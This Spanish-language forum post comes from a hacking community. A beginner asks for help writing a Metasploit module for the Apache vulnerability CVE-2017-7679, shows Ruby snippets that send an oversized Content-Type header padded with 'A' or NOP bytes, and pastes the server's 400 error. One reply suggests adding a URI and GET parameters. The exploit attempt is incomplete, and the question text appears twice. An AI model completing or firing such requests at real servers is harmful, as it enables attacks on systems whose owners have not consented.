Bienvenidos al nuevo foro de hackplayers. En caso de encontrarse cualquier tipo de error, contacte con cualquier administrador por mensaje privado.
Recuerda que, para incrementar tu privacidad, tambien puedes acceder al foro usando el dominio forohpysho2t5mjs.onion de la red tor.
Recuerda que, para incrementar tu privacidad, tambien puedes acceder al foro usando el dominio forohpysho2t5mjs.onion de la red tor.
CVE-2017-7679
Quería hacer mi primer exploit en metasploit, para esto elegí la vulnerabilidad CVE-2017-7679 porque no parecia muy dificil. https://packetstormsecurity.com/files/cve/CVE-2017-7679
Y apesar que mi inglés no es muy bueno, pensé que el código sería algo como esto:
buff="A" * 8700
res=send_request_cgi({
'method' =>'GET',
'ctype' =>'text/html;'+ buff
},)
Todo parecía muy simple, sin embargo algo no termina de funcionar como yo lo interpreté porque me arroja un error 400 pero no crashea y aunque agregue mas bytes solo consigo lo mismo
buff="\x90" * 9700000
res=send_request_cgi({
'method' =>'GET',
'ctype' =>'text/html;'+ buff
},)
[-] Received a 400 for the request
[-] Date: Mon, 28 Aug 2017 21:33:37 GMT
Server: Apache/2.4.7 (Ubuntu)
Content-Length: 390
Connection: close
Content-Type: text/html; charset=iso-8859-1
alguna idea sobre cómo encarar esto? alguna recomendacion par aalguien que recien empieza? mas detalles sobre la vulnerabilidad. Todo es bienvenido.
Y apesar que mi inglés no es muy bueno, pensé que el código sería algo como esto:
buff="A" * 8700
res=send_request_cgi({
'method' =>'GET',
'ctype' =>'text/html;'+ buff
},)
Todo parecía muy simple, sin embargo algo no termina de funcionar como yo lo interpreté porque me arroja un error 400 pero no crashea y aunque agregue mas bytes solo consigo lo mismo
buff="\x90" * 9700000
res=send_request_cgi({
'method' =>'GET',
'ctype' =>'text/html;'+ buff
},)
[-] Received a 400 for the request
[-] Date: Mon, 28 Aug 2017 21:33:37 GMT
Server: Apache/2.4.7 (Ubuntu)
Content-Length: 390
Connection: close
Content-Type: text/html; charset=iso-8859-1
alguna idea sobre cómo encarar esto? alguna recomendacion par aalguien que recien empieza? mas detalles sobre la vulnerabilidad. Todo es bienvenido.
Accede o Regístrate para comentar.
Comentarios
creo no esta completo, el method' => 'GET', esta bien enviaras por la url , ahora te falta especificar esa url algo así 'uri' => '/hello_world.php', y los parametros de envio 'vars_get' => {'param_1' => 'hola'}, espero te sirva de ayudar saludos